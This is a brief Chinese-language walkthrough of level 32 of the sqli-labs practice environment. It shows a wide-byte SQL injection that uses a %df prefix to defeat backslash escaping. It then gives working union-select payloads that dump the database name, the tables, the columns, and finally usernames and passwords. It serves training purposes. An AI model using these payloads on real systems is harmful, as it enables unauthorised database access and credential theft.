sql-lab第32关之宽字节绕过

首先查询下回显位，但是发现hint中提示了 1和单引号之间多了一个反斜杠\

 所以可能为宽字节注入

输入?id=1%df' order by 4 --+

 发现正常了，

接下来就是正常操作了

爆库:id=-1%df' union select 1,2,database()--+

爆表:?id=-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

爆列]:?id=-1%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --+ （这里的0x7573657273为'users'的16进制编码）

因为单引号会被转义为\'  所以 'users' 会变成 \'users\' 从而无法进行正常的查询

获取:?id=-1%df' union select 1,2,group_concat(username,0x7e,password) from users --+  （这里的0x7e为'~'）